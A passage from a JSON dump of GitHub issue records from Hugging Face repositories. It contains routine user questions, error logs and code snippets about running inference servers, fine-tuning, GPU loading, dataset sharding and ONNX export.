change)\r\nhttps://github.com/huggingface/chat-ui/blob/ee47ff37fddb70f78d1ef8a293d8ed3fbcd24ff9/src/lib/server/endpoints/openai/endpointOai.ts#L13C1-L13C65", "url": "https://github.com/huggingface/chat-ui/issues/708", "state": "open", "labels": [ "support", "models" ], "created_at": "2024-01-18T18:27:27Z", "updated_at": "2024-01-25T17:28:28Z", "comments": 4, "user": "fbarbe00" }, { "repo": "huggingface/text-generation-inference", "number": 1451, "title": "How to run text generation inference locally", "body": "### System Info\n\nI completed the steps for local installation of Text Generation Inference as in here: https://github.com/huggingface/text-generation-inference#local-install\r\nI did all the installation on my local Linux (WSL). The model endpoint that I want to draw inference from is on my EC2. (I trained Mistral 7b model).\r\nWhen I run `text-generation-launcher --env` , I get the following:\r\n\r\n```\r\n(text-generation-inference) tammosta@SEA-1801247735:~/text-generation-inference$ text-generation-launcher --env\r\nerror: invalid value 'True' for '--disable-custom-kernels'\r\n [possible values: true, false]\r\n\r\n tip: a similar value exists: 'true'\r\n\r\nFor more information, try '--help'.\r\n(text-generation-inference) tammosta@SEA-1801247735:~/text-generation-inference$ export DISABLE_CUSTOM_KERNELS=true\r\n(text-generation-inference) tammosta@SEA-1801247735:~/text-generation-inference$ text-generation-launcher --env\r\n2024-01-17T19:54:02.802338Z INFO text_generation_launcher: Runtime environment:\r\nTarget: x86_64-unknown-linux-gnu\r\nCargo version: 1.70.0\r\nCommit sha: 0eabc83541225979209ff7183b4b4442e47adf92\r\nDocker label: N/A\r\nnvidia-smi:\r\nN/A\r\n2024-01-17T19:54:02.802403Z INFO text_generation_launcher: Args { model_id: \"bigscience/bloom-560m\", revision: None, validation_workers: 2, sharded: None, num_shard: None, quantize: None, speculate: None, dtype: None, trust_remote_code: false, max_concurrent_requests: 128, max_best_of: 2, max_stop_sequences: 4, max_top_n_tokens: 5, max_input_length: 1024, max_total_tokens: 2048, waiting_served_ratio: 1.2, max_batch_prefill_tokens: 4096, max_batch_total_tokens: None, max_waiting_tokens: 20, hostname: \"0.0.0.0\", port: 3000, shard_uds_path: \"/tmp/text-generation-server\", master_addr: \"localhost\", master_port: 29500, huggingface_hub_cache: None, weights_cache_override: None, disable_custom_kernels: true, cuda_memory_fraction: 1.0, rope_scaling: None, rope_factor: None, json_output: false, otlp_endpoint: None, cors_allow_origin: [], watermark_gamma: None, watermark_delta: None, ngrok: false, ngrok_authtoken: None, ngrok_edge: None, env: true }\r\n2024-01-17T19:54:02.802591Z INFO download: text_generation_launcher: Starting download process.\r\n2024-01-17T19:54:09.019117Z INFO text_generation_launcher: Download file: model.safetensors\r\n\r\n2024-01-17T19:54:51.649553Z INFO text_generation_launcher: Downloaded /home/tammosta/.cache/huggingface/hub/models--bigscience--bloom-560m/snapshots/ac2ae5fab2ce3f9f40dc79b5ca9f637430d24971/model.safetensors in 0:00:42.\r\n\r\n2024-01-17T19:54:51.649696Z INFO text_generation_launcher: Download: [1/1] -- ETA: 0\r\n\r\n2024-01-17T19:54:52.249742Z INFO download: text_generation_launcher: Successfully downloaded weights.\r\n2024-01-17T19:54:52.250108Z INFO shard-manager: text_generation_launcher: Starting shard rank=0\r\n2024-01-17T19:54:56.525795Z WARN text_generation_launcher: We're not using custom kernels.\r\n\r\n2024-01-17T19:54:56.534344Z WARN text_generation_launcher: Could not import Flash Attention enabled models: No module named 'vllm'\r\n\r\n2024-01-17T19:55:01.117291Z INFO text_generation_launcher: Server started at unix:///tmp/text-generation-server-0\r\n\r\n2024-01-17T19:55:01.167200Z INFO shard-manager: text_generation_launcher: Shard ready in 8.916023926s rank=0\r\n2024-01-17T19:55:01.265832Z INFO text_generation_launcher: Starting Webserver\r\n2024-01-17T19:55:01.366710Z INFO text_generation_router: router/src/main.rs:178: Using the Hugging Face API\r\n2024-01-17T19:55:01.366788Z INFO hf_hub: /home/tammosta/.cargo/registry/src/index.crates.io-6f17d22bba15001f/hf-hub-0.3.2/src/lib.rs:55: Token file not found \"/home/tammosta/.cache/huggingface/token\"\r\n2024-01-17T19:55:02.294337Z INFO text_generation_router: router/src/main.rs:416: Serving revision ac2ae5fab2ce3f9f40dc79b5ca9f637430d24971 of model bigscience/bloom-560m\r\n2024-01-17T19:55:02.294415Z INFO text_generation_router: router/src/main.rs:234: Using the Hugging Face API to retrieve tokenizer config\r\n2024-01-17T19:55:02.315279Z INFO text_generation_router: router/src/main.rs:277: Warming up model\r\n2024-01-17T19:55:46.211550Z ERROR shard-manager: text_generation_launcher: Shard complete standard error output:\r\n\r\n/home/tammosta/anaconda3/envs/text-generation-inference/lib/python3.9/site-packages/bitsandbytes/cextension.py:34: UserWarning: The installed version of bitsandbytes was compiled without GPU support. 8-bit optimizers, 8-bit multiplication, and GPU quantization are unavailable.\r\n warn(\"The installed version of bitsandbytes was compiled without GPU support. \"\r\nconfig.json: 100%|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| 693/693 [00:00<00:00, 189kB/s]\r\ntokenizer_config.json: 100%|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| 222/222 [00:00<00:00, 106kB/s]\r\ntokenizer.json: 100%|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| 14.5M/14.5M [00:00<00:00, 23.4MB/s]\r\nspecial_tokens_map.json: 100%|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| 85.0/85.0 [00:00<00:00, 34.9kB/s]\r\n/home/tammosta/text-generation-inference/server/text_generation_server/models/custom_modeling/bloom_modeling.py:882: FutureWarning: `position_ids` have no functionalit", "url": "https://github.com/huggingface/text-generation-inference/issues/1451", "state": "closed", "labels": [ "Stale" ], "created_at": "2024-01-17T20:12:35Z", "updated_at": "2024-02-22T01:44:26Z", "user": "tamanna-mostafa" }, { "repo": "huggingface/diffusers", "number": 6614, "title": "How to train text_to_image with images which is resolution of 512x768 ?", "body": "I want to finetune the sd1.5 with 50k images, all the image is resolution of 512x768. But I got error like this:\r\n\r\n`train_text_to_image.py:` error: argument --resolution: invalid int value: '[512,768]'`\r\n\r\nso, how to train text_to_image with images which is resolution of 512x768?", "url": "https://github.com/huggingface/diffusers/issues/6614", "state": "closed", "labels": [], "created_at": "2024-01-17T13:51:16Z", "updated_at": "2024-01-25T14:28:01Z", "user": "lingxuan630" }, { "repo": "huggingface/accelerate", "number": 2347, "title": "How to load model to specified GPU devices?", "body": "I'm trying a large model LLaVA1.5.\r\n\r\nI know that if I set the parameter `device_map='auto'` in `LlavaMPTForCausalLM.from_pretrained`, the model will be loaded on all visible GPUs (FSDP).\r\n\r\nNow I hope to load LLaVA1.5 on some of the visible GPUs, still in the FSDP mode, and automatically decide device_map like `device_map='auto'`. Note that the GPUs can be **arbitrarily assigned**, i.e. GPU 2, 3, 4, but not starting with GPU 0. \r\nI try to achieve this by passing a `max_memory`, like\r\n`model = LlavaMPTForCausalLM.from_pretrained(model_path,device_map='auto', max_memory={2: 33271054336, 3: 33271054336, 4: 33271054336})`\r\n\r\nHowever, an error occured\r\n![image](https://github.com/huggingface/accelerate/assets/46648807/85a2eafc-ac94-4122-aae3-9a105d631f96)\r\n\r\nI think the loop should be modified?\r\nOr is there are any simpler ways to achieve my goal?", "url": "https://github.com/huggingface/accelerate/issues/2347", "state": "closed", "labels": [], "created_at": "2024-01-17T09:23:04Z", "updated_at": "2024-02-26T15:06:36Z", "user": "davidluciolu" }, { "repo": "huggingface/transformers", "number": 28546, "title": "How to use fp32 and qLora to fine-tune models", "body": "### System Info\n\nI'm using transformers version 4.32.0 and I want to fine-tune the Qwen/Qwen-VL-Chat-Int4 model, but my 1080ti GPU doesn't support fp16. When I want to use \"training_args.fp16 = False\" to modify the parameters, the error \"dataclasses.FrozenInstanceError: cannot assign to field fp16\" will be reported. I guess this parameter cannot be changed manually. What should I do besides changing the GPU so that it can use fp16?\n\n### Who can help?\n\n_No response_\n\n### Information\n\n- [ ] The official example scripts\n- [X] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [X] My own task or dataset (give details below)\n\n### Reproduction\n\nI am using the fine-tuning code given by Qwen\uff1a\r\n```python\r\n parser = transformers.HfArgumentParser(\r\n (ModelArguments, DataArguments, TrainingArguments, LoraArguments)\r\n )\r\n (\r\n model_args,\r\n data_args,\r\n training_args,\r\n lora_args,\r\n ) = parser.parse_args_into_dataclasses()\r\n if getattr(training_args, 'deepspeed', None) and getattr(lora_args, 'q_lora', False):\r\n training_args.distributed_state.distributed_type = DistributedType.DEEPSPEED\r\n training_args.fp16 = False\r\n compute_dtype = (\r\n torch.float16\r\n if training_args.fp16\r\n else (torch.bfloat16 if training_args.bf16 else torch.float32)\r\n )\r\n\r\n local_rank = training_args.local_rank\r\n\r\n device_map = None\r\n world_size = int(os.environ.get(\"WORLD_SIZE\", 1))\r\n ddp = world_size != 1\r\n if lora_args.q_lora:\r\n device_map = {\"\": int(os.environ.get(\"LOCAL_RANK\") or 0)} if ddp else None\r\n if len(training_args.fsdp) > 0 or deepspeed.is_deepspeed_zero3_enabled():\r\n logging.warning(\r\n \"FSDP or ZeRO3 are not incompatible with QLoRA.\"\r\n )\r\n\r\n # Set RoPE scaling factor\r\n config = transformers.AutoConfig.from_pretrained(\r\n model_args.model_name_or_path,\r\n cache_dir=training_args.cache_dir,\r\n trust_remote_code=True,\r\n )\r\n config.use_cache = False\r\n\r\n # Load model and tokenizer\r\n model = transformers.AutoModelForCausalLM.from_pretrained(\r\n model_args.model_name_or_path,\r\n config=config,\r\n cache_dir=training_args.cache_dir,\r\n device_map=device_map,\r\n trust_remote_code=True,\r\n quantization_config=GPTQConfig(\r\n bits=4, disable_exllama=True\r\n )\r\n if training_args.use_lora and lora_args.q_lora\r\n else None,\r\n \uff09\r\n``` \n\n### Expected behavior\n\nI want a solution", "url": "https://github.com/huggingface/transformers/issues/28546", "state": "closed", "labels": [], "created_at": "2024-01-17T07:16:11Z", "updated_at": "2024-02-26T08:04:39Z", "user": "guoyunqingyue" }, { "repo": "huggingface/sentence-transformers", "number": 2416, "title": "How to specify class weights in model training?", "body": "I am having a very imbalanced training dataset. Is there a way I could specify class weights (e.g., class 0: 0.1, class 1: 1) for cross encoder training? ", "url": "https://github.com/huggingface/sentence-transformers/issues/2416", "state": "closed", "labels": [], "created_at": "2024-01-16T21:00:27Z", "updated_at": "2024-01-20T15:49:54Z", "user": "mucun1988" }, { "repo": "huggingface/chat-ui", "number": 697, "title": "Add streaming support for SageMaker endpoints", "body": "Would be nice to have support for streaming tokens from sagemaker. here are some ressources from my conversation with @philschmid \r\n\r\n### Code sample (Python Code)\r\n```\r\nbody = {\"inputs\": \"what is life\", \"parameters\": {\"max_new_tokens\":400}}\r\nresp = smr.invoke_endpoint_with_response_stream(EndpointName=endpoint_name, Body=json.dumps(body), ContentType=\"application/json\")\r\nevent_stream = resp['Body']\r\n\r\nfor line in LineIterator(event_stream):\r\n resp = json.loads(line)\r\n print(resp.get(\"outputs\")[0], end='')\r\n```\r\n\r\n### Docs (JS)\r\nhttps://docs.aws.amazon.com/AWSJavaScriptSDK/v3/latest/client/sagemaker-runtime/command/InvokeEndpointWithResponseStreamCommand/", "url": "https://github.com/huggingface/chat-ui/issues/697", "state": "open", "labels": [ "enhancement", "back" ], "created_at": "2024-01-16T10:59:47Z", "updated_at": "2024-01-16T11:00:32Z", "comments": 0, "user": "nsarrazin" }, { "repo": "huggingface/transformers.js", "number": 522, "title": "Is it possible to fine-tune the hosted pretrained models?", "body": "### Question\r\nHello,\r\nIf we have a large dataset in our domain, can we use it to fine-tune the hosted pretrained models(for example: Xenova/nllb-200-distilled-600M) with optimum? or is it possible to convert our own translation Pytorch model to ONNX which can be compatible with transformer.js?", "url": "https://github.com/huggingface/transformers.js/issues/522", "state": "open", "labels": [ "question" ], "created_at": "2024-01-16T03:55:39Z", "updated_at": "2024-01-16T12:54:53Z", "user": "lhohoz" }, { "repo": "huggingface/datasets", "number": 6594, "title": "IterableDataset sharding logic needs improvement", "body": "### Describe the bug\r\n\r\nThe sharding of IterableDatasets with respect to distributed and dataloader worker processes appears problematic with significant performance traps and inconsistencies wrt to distributed train processes vs worker processes.\r\n\r\nSplitting across num_workers (per train process loader processes) and world_size (distributed training processes) appears inconsistent.\r\n* worker split: https://github.com/huggingface/datasets/blob/9d6d16117a30ba345b0236407975f701c5b288d4/src/datasets/iterable_dataset.py#L1266-L1283\r\n* distributed split: https://github.com/huggingface/datasets/blob/9d6d16117a30ba345b0236407975f701c5b288d4/src/datasets/iterable_dataset.py#L1335-L1356\r\n\r\nIn the case of the distributed split, there is a modulus check that flips between two very different behaviours, why is this different than splitting across the data loader workers? For IterableDatasets the DataLoaders worker processes are independent, so whether it's workers within one train process or across a distributed world the shards should be distributed the same, across `world_size * num_worker` independent workers in either case... \r\n\r\nFurther, the fallback case when the `n_shards % world_size == 0` check fails is a rather extreme change. I argue it is not desirable to do that implicitly, it should be an explicit case for specific scenarios (ie reliable validation). A train scenario would likely be much better handled with improved wrapping / stopping behaviour to eg also fix #6437. Changing from stepping shards to stepping samples means that every single process reads ALL of the shards. This was never an intended default for sharded training, shards gain their performance advantage in large scale distributed training by explicitly avoiding the need to have every process overlapping in the data they read, by default, only the data allocated to each process via their assigned shards should be read in each pass of the dataset.\r\n\r\nUsing a large scale CLIP example, some of the larger datasets have 10-20k shards across 100+TB of data. Training with 1000 GPUs we are switching between reading 100 terabytes per epoch to 100 petabytes if say change 20k % 1000 and drop one gpu-node to 20k % 992.\r\n\r\nThe 'step over samples' case might be worth the overhead in specific validation scenarios where gaurantees of at least/most once samples seen are more important and do not make up a significant portion of train time or are done in smaller world sizes outside of train.\r\n\r\n### Steps to reproduce the bug\r\n\r\nN/A\r\n\r\n### Expected behavior\r\n\r\nWe have an iterable dataset with N shards, to split across workers\r\n* shuffle shards (same seed across all train processes)\r\n* step shard iterator across distributed processes\r\n* step shard iterator across dataloader worker processes\r\n* shuffle samples in every worker via shuffle buffer (different seed in each worker, but ideally controllable (based on base seed + worker id + epoch).\r\n* end up with (possibly uneven) number of shards per worker but each shard only ever accessed by 1 worker per pass (epoch)\r\n\r\n\r\n\r\n### Environment info\r\n\r\nN/A", "url": "https://github.com/huggingface/datasets/issues/6594", "state": "open", "labels": [], "created_at": "2024-01-15T22:22:36Z", "updated_at": "2025-11-10T14:55:20Z", "comments": 7, "user": "rwightman" }, { "repo": "huggingface/alignment-handbook", "number": 103, "title": "Does QLora DPO Training support reference model?", "body": "Hello! Thanks for your awesome work!\r\n I meet an issue when I run dpo with qlora. I notice there is a setting:\r\n```\r\n if model_args.use_peft is True:\r\n ref_model = None\r\n ref_model_kwargs = None\r\n```\r\nI also notice that the `use_peft` is set to true only in config_qlora.yaml. This means if we use qlora to do dpo training, we do not use reference model at all. \r\nI wonder if this code support qlora training with reference model? Thanks!", "url": "https://github.com/huggingface/alignment-handbook/issues/103", "state": "open", "labels": [], "created_at": "2024-01-15T09:22:32Z", "updated_at": "2024-01-15T09:27:08Z", "comments": 0, "user": "Harry-mic" }, { "repo": "huggingface/swift-coreml-diffusers", "number": 91, "title": "How to import new .SAFETENSORS model?", "body": "How can I import a safetensor formatted model into the diffusers app?\r\n\r\nI tried copying the safetensor file to the folder loaded by the dropdown menu. But when I relaunch the app, it doesn't show the new model in the menu.", "url": "https://github.com/huggingface/swift-coreml-diffusers/issues/91", "state": "open", "labels": [], "created_at": "2024-01-15T08:24:53Z", "updated_at": "2024-07-07T09:03:27Z", "user": "mcandre" }, { "repo": "huggingface/candle", "number": 1585, "title": "Extension request: How to construct Tensor for n-dimensional Vec", "body": "How do I best create a Tensor from a &Vec> type? Everything above 1D is quite hard to manage for index based value setting. ", "url": "https://github.com/huggingface/candle/issues/1585", "state": "closed", "labels": [], "created_at": "2024-01-14T17:46:57Z", "updated_at": "2025-11-23T20:22:09Z", "user": "BDUG" }, { "repo": "huggingface/nanotron", "number": 21, "title": "Save checkpoint before terminating the training run", "body": "Why don't we save a model checkpoint before terminating the training run? [[link]](https://github.com/huggingface/nanotron/blob/fd99571e3769cb1876d5c9d698b512e85a6e4896/src/nanotron/trainer.py#L429)\r\n\r\n\"image\"\r\n", "url": "https://github.com/huggingface/nanotron/issues/21", "state": "closed", "labels": [ "question" ], "created_at": "2024-01-13T11:28:20Z", "updated_at": "2024-01-13T11:28:54Z", "user": "xrsrke" }, { "repo": "huggingface/accelerate", "number": 2331, "title": "How to share non-tensor data between processes?", "body": "I am running a training on 2 GPUs on the same machine. I need a way to share some float values and maybe dicts between the two processes. I saw that there is a `gather` method, but this only works for tensors.\r\n\r\nIs there any way to do inter-process communication that is not directly related to the training?\r\n\r\nEDIT: What I want to do is log the AVERAGE training error of my model after each epoch. The problem is that the process I am logging from only sees the training error that was computed in this process", "url": "https://github.com/huggingface/accelerate/issues/2331", "state": "closed", "labels": [], "created_at": "2024-01-12T19:13:27Z", "updated_at": "2024-01-16T11:36:34Z", "user": "simonhessner" }, { "repo": "huggingface/transformers", "number": 28476, "title": "How to avoid the peak RAM memory usage of a model when I want to load to GPU", "body": "### System Info\n\n- `transformers` version: 4.36.2\r\n- Platform: Linux-5.10.201-191.748.amzn2.x86_64-x86_64-with-glibc2.31\r\n- Python version: 3.10.13\r\n- Huggingface_hub version: 0.20.2\r\n- Safetensors version: 0.4.1\r\n- Accelerate version: 0.26.0\r\n- Accelerate config: \tnot found\r\n- PyTorch version (GPU?): 2.1.0 (True)\r\n- Tensorflow version (GPU?): not installed (NA)\r\n- Flax version (CPU?/GPU?/TPU?): not installed (NA)\r\n- Jax version: not installed\r\n- JaxLib version: not installed\r\n- Using GPU in script?: \r\n- Using distributed or parallel set-up in script?: \r\n\n\n### Who can help?\n\nI am using transformers to load a model into GPU, and I observed that before moving the model to GPU there is a peak of RAM usage that later gets unused. I assume the model is loaded into CPU before moving into GPU.\r\n\r\nIn GPU model takes around 4Gi and to load it I need more than 7Gi of RAM which seems weird.\r\n\r\nIs there a way to load it direcly to the GPU without spending so much RAM?\r\n\r\nI have tried with the `low_cpu_mem_usage` and `device_map` parameter to `cuda` and `auto` but no luck.\r\n\r\n```python\r\nfrom transformers import AutoModel; m = AutoModel.from_pretrained(\"jinaai/jina-embeddings-v2-base-en\", trust_remote_code=True, low_cpu_mem_usage=True, device_map=\"auto\")\r\n``` \n\n### Information\n\n- [ ] The official example scripts\n- [X] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [X] My own task or dataset (give details below)\n\n### Reproduction\n\n```python\r\nfrom transformers import AutoModel; m = AutoModel.from_pretrained(\"jinaai/jina-embeddings-v2-base-en\", trust_remote_code=True, low_cpu_mem_usage=True, device_map=\"auto\")\r\n```\n\n### Expected behavior\n\nNot having such a memory peak", "url": "https://github.com/huggingface/transformers/issues/28476", "state": "closed", "labels": [], "created_at": "2024-01-12T11:39:52Z", "updated_at": "2024-02-12T08:08:17Z", "user": "JoanFM" }, { "repo": "huggingface/datasets", "number": 6584, "title": "np.fromfile not supported", "body": "How to do np.fromfile to use it like np.load\r\n\r\n\r\n```python\r\ndef xnumpy_fromfile(filepath_or_buffer, *args, download_config: Optional[DownloadConfig] = None, **kwargs):\r\n import numpy as np\r\n\r\n if hasattr(filepath_or_buffer, \"read\"):\r\n return np.fromfile(filepath_or_buffer, *args, **kwargs)\r\n else:\r\n filepath_or_buffer = str(filepath_or_buffer)\r\n return np.fromfile(xopen(filepath_or_buffer, \"rb\", download_config=download_config).read(), *args, **kwargs)\r\n```\r\nthis is not work\r\n", "url": "https://github.com/huggingface/datasets/issues/6584", "state": "open", "labels": [], "created_at": "2024-01-12T09:46:17Z", "updated_at": "2024-01-15T05:20:50Z", "comments": 6, "user": "d710055071" }, { "repo": "huggingface/distil-whisper", "number": 73, "title": "I want to confirm how the knowledge organization is implemented\uff1f", "body": "I don't quite understand how knowledge distillation is implemented here. \r\n\r\nWhisper is trained on 680,000 hours of untagged data for autoregression. According to the content of the fourth section of the paper, our model is trained on 21,170 hours of data with pseudo-labels generated by Whisper, with the first and 32nd layer parameters frozen based on Whisper. **This means that our model only needs to go through 21,170 hours of data with pseudo-labels and a model structure similar to Whisper, freezing the first and 32nd layers, using weighted KL divergence and label cross-entropy to achieve good results\uff1f**\r\n\r\nIf this is the case, it is indeed a significant discovery, indicating that we can always reduce the model's parameters and inference time after pre-training the model using similar methods, without significant loss of accuracy.\r\n\r\nThank you in advance", "url": "https://github.com/huggingface/distil-whisper/issues/73", "state": "open", "labels": [], "created_at": "2024-01-12T07:43:21Z", "updated_at": "2024-01-17T16:57:31Z", "user": "hxypqr" }, { "repo": "huggingface/transformers.js", "number": 516, "title": "How to access attentions matrix for MarianMT?", "body": "### Question\r\n\r\nHey, I've been trying to access the attentions output by the MarianMT like so (please excuse the unorthodox config argument, tidying up is next on my todo list):\r\n\r\n```\r\n const model_name = \"Xenova/opus-mt-en-fr\";\r\n const tokenizer = await MarianTokenizer.from_pretrained(model_name, {\r\n config: {\r\n output_hidden_states: true,\r\n output_attentions: true\r\n }\r\n })\r\n const tokens = (await tokenizer(text)).input_ids;\r\n const model = await MarianMTModel.from_pretrained(model_name, {\r\n config: {\r\n model_type: 'marian',\r\n is_encoder_decoder: true,\r\n _name_or_path: 'Helsinki-NLP/opus-mt-en-fr',\r\n _num_labels: 3,\r\n activation_dropout: 0,\r\n activation_function: 'swish',\r\n add_bias_logits: false,\r\n add_final_layer_norm: false,\r\n architectures: ['MarianMTModel'],\r\n attention_dropout: 0,\r\n bad_words_ids: [[Array]],\r\n bos_token_id: 0,\r\n classif_dropout: 0,\r\n classifier_dropout: 0,\r\n d_model: 512,\r\n decoder_attention_heads: 8,\r\n decoder_ffn_dim: 2048,\r\n decoder_layerdrop: 0,\r\n decoder_layers: 6,\r\n decoder_start_token_id: 59513,\r\n decoder_vocab_size: 59514,\r\n dropout: 0.1,\r\n encoder_attention_heads: 8,\r\n encoder_ffn_dim: 2048,\r\n encoder_layerdrop: 0,\r\n encoder_layers: 6,\r\n eos_token_id: 0,\r\n forced_eos_token_id: 0,\r\n gradient_checkpointing: false,\r\n id2label: { '0': 'LABEL_0', '1': 'LABEL_1', '2': 'LABEL_2' },\r\n init_std: 0.02,\r\n label2id: { LABEL_0: 0, LABEL_1: 1, LABEL_2: 2 },\r\n max_length: 512,\r\n max_position_embeddings: 512,\r\n normalize_before: false,\r\n normalize_embedding: false,\r\n num_beams: 4,\r\n num_hidden_layers: 6,\r\n pad_token_id: 59513,\r\n scale_embedding: true,\r\n share_encoder_decoder_embeddings: true,\r\n static_position_embeddings: true,\r\n transformers_version: '4.34.0.dev0',\r\n use_cache: true,\r\n vocab_size: 59514,\r\n output_hidden_states: true,\r\n output_cross_attentions: true,\r\n output_attentions: true\r\n }\r\n })\r\n const translated = await model.generate(tokens)\r\n const result = tokenizer.decode(translated[0], { skip_special_tokens: true })\r\n console.log((await model.getAttentions(translated)))\r\n\r\n```\r\n\r\nI'm then getting the following error when I run the code:\r\n\r\n`\r\nError: `output_attentions` is true, but the model did not produce cross-attentions. This is most likely because the model was not exported with `output_attentions=True`.\r\n`\r\n\r\nI've looked around but haven't been able to find out what is meant by the reference to exporting the model. How would I go about fixing this?", "url": "https://github.com/huggingface/transformers.js/issues/516", "state": "open", "labels": [ "question" ], "created_at": "2024-01-11T20:16:42Z", "updated_at": "2024-01-15T08:21:17Z", "user": "DaveTJones" }, { "repo": "huggingface/text-generation-inference", "number": 1437, "title": "How to run text-generation-benchmark without the graph and get the output data into a csv file or a json file?", "body": "### Feature request\n\ntext-generation-benchmark has been an amazing tool for understanding the model deployments better. Is there a way where we can run this without generating the graph and get the results in a csv format?\n\n### Motivation\n\nMotivation is that we want to use this tool with another program which gets the results from the binary. \n\n### Your contribution\n\nI'm not sure. Looks like an addition to the TGI-benchmark parameter and it can be a potential PR", "url": "https://github.com/huggingface/text-generation-inference/issues/1437", "state": "closed", "labels": [ "Stale" ], "created_at": "2024-01-11T15:33:37Z", "updated_at": "2024-02-17T01:44:18Z", "user": "pranavthombare" }, { "repo": "huggingface/transformers.js", "number": 515, "title": "ONNX optimisations for edge deployment", "body": "### Question\r\n\r\nHello, I'm exploring if I can extract any more performance from my deployment of transformers.js. Appreciate the answer to this is nuanced and best answered by profiling, but would value opinions of experts that have walked this path before using this lib.\r\n\r\nIn my specific use case I know that I will always be deploying to the latest chrome running on windows systems that exist in VM and do not have a dedicated GPU (i.e. vanilla corprate desktop)\r\n\r\nIn the current util, during the export no optimization flag is passed so by default the models aren't optimized. https://github.com/xenova/transformers.js/blob/main/scripts/convert.py#L426 \r\n\r\nThe main export takes a AutoOptimization level as a string and given no GPU's I would be restricted to 03.\r\nhttps://github.com/huggingface/optimum/blob/main/optimum/exporters/onnx/__main__.py#L567\r\n\r\n##Questions:\r\n\r\n1. Is there any reasons I wouldn't want to optimize a model using transformers.js?\r\n2. Auto optimize seems to detect BERT automatically.\r\nhttps://github.com/microsoft/onnxruntime/blob/main/onnxruntime/python/tools/transformers/fusion_options.py#L56 \r\nIs there any reason that I should modify transformers.js convert.py to to manually call ORTOptimizer with a OptimizationConfig inbetween steps 1&2 instead of passing a level string in step 1?\r\nhttps://github.com/xenova/transformers.js/blob/main/scripts/convert.py#L429\r\n", "url": "https://github.com/huggingface/transformers.js/issues/515", "state": "closed", "labels": [ "question" ], "created_at": "2024-01-11T13:49:59Z", "updated_at": "2025-10-13T04:59:32Z", "user": "georgedavies019" }, { "repo": "huggingface/alignment-handbook", "number": 98, "title": "Is QLoRA better than finetuning?", "body": "The results reported in https://github.com/huggingface/alignment-handbook/pull/88 suggest that QLoRA is better for both SFT and DPO. Is this accurate, and have people seen this happen in any other settings?", "url": "https://github.com/huggingface/alignment-handbook/issues/98", "state": "open", "labels": [], "created_at": "2024-01-10T21:04:11Z", "updated_at": "2024-01-10T21:04:11Z", "comments": 0, "user": "normster" }, { "repo": "huggingface/transformers.js", "number": 514, "title": "Is it possible to use adapters from the hub?", "body": "### Question\n\nHi, would it be possible to use adapters on top of a model using the js library?", "url": "https://github.com/huggingface/transformers.js/issues/514", "state": "open", "labels": [ "question" ], "created_at": "2024-01-10T20:57:03Z", "updated_at": "2024-01-11T16:01:11Z", "user": "vabatta" }, { "repo": "huggingface/setfit", "number": 468, "title": "How effective is to use your own pre-trained ST model based on NLI dataset ?", "body": "Hi !\r\n\r\nI'm interested to use SetFit for classify text extracted from hotel reviews (booking, tripadvisor, etc) but I would to add domain knowledge to my Sentence Transfomers body.\r\n\r\nFor example, this [paper](https://arxiv.org/abs/2202.01924) use a Sentence Transformers model trained on a custom NLI dataset (RNLI for Review Natural Langage Inference) for extract product features without training on labeled data. The results show that a train on domain based NLI dataset is better that the MNLI for Zero-Shot aspect extraction.\r\n\r\nSo, is it a good approach to train my own Sentence Transformers model (or fine-tune a pre-trained) on NLI domain based dataset for improve performance of SetFit ?\r\n\r\nThank you in advance ", "url": "https://github.com/huggingface/setfit/issues/468", "state": "closed", "labels": [], "created_at": "2024-01-10T19:25:09Z", "updated_at": "2024-02-09T14:55:46Z", "user": "azaismarc" }, { "repo": "huggingface/transformers.js", "number": 512, "title": "What do you all think about having a \"Transformers.js Community\" in Hugging Face?", "body": "### Question\n\nAfter checking how [MLX Community on Hugging Face](https://huggingface.co/mlx-community) is working, I thought it could be a good idea to have one for Transformers.js.\r\n\r\nOne of the key benefits of a community is \"multiple curators\": anyone in the community would have the ability to edit the repositories, which makes it easier to maintain the converted models and ensure that they have more detailed Readmes.\r\n\r\nAlso, having multiple curators allows for quicker resolution of issues with the model configuration. Members of the community won't need to create a pull request to request changes or wait for someone to approve the PR, which is especially important for urgent fixes.\r\n\r\nAnother good move the MLX community made was releasing a script that automatically uploads models to the organization in Hugging Face, which makes it easy for anyone to convert and share their favorite models.\r\n\r\nI would love to hear the opinions of others.", "url": "https://github.com/huggingface/transformers.js/issues/512", "state": "closed", "labels": [ "question" ], "created_at": "2024-01-10T16:03:51Z", "updated_at": "2025-05-10T21:06:54Z", "user": "felladrin" }, { "repo": "huggingface/candle", "number": 1552, "title": "How to pass the attention_mask to Bert model in examples?", "body": "I am trying to run `shibing624/text2vec-base-chinese` with candle, and the encoder returns `input_ids`, `attention_mask`, `token_id_types`, but there are only two params of BertModel in candle.\r\n\r\nhttps://github.com/huggingface/candle/blob/main/candle-examples/examples/bert/main.rs#L170\r\n\r\n```python\r\nfrom transformers import BertTokenizer, BertModel\r\nimport torch\r\n\r\n# Mean Pooling - Take attention mask into account for correct averaging\r\ndef mean_pooling(model_output, attention_mask):\r\n token_embeddings = model_output[0] # First element of model_output contains all token embeddings\r\n input_mask_expanded = attention_mask.unsqueeze(-1).expand(token_embeddings.size()).float()\r\n return torch.sum(token_embeddings * input_mask_expanded, 1) / torch.clamp(input_mask_expanded.sum(1), min=1e-9)\r\n\r\n# Load model from HuggingFace Hub\r\ntokenizer = BertTokenizer.from_pretrained('shibing624/text2vec-base-chinese')\r\nmodel = BertModel.from_pretrained('shibing624/text2vec-base-chinese')\r\nsentences = ['\u5982\u4f55\u66f4\u6362\u82b1\u5457\u7ed1\u5b9a\u94f6\u884c\u5361', '\u82b1\u5457\u66f4\u6539\u7ed1\u5b9a\u94f6\u884c\u5361']\r\n# Tokenize sentences\r\nencoded_input = tokenizer(sentences, padding=True, truncation=True, return_tensors='pt')\r\n\r\n# Compute token embeddings\r\nwith torch.no_grad():\r\n model_output = model(**encoded_input)\r\n# Perform pooling. In this case, mean pooling.\r\nsentence_embeddings = mean_pooling(model_output, encoded_input['attention_mask'])\r\nprint(\"Sentence embeddings:\")\r\nprint(sentence_embeddings)\r\n```", "url": 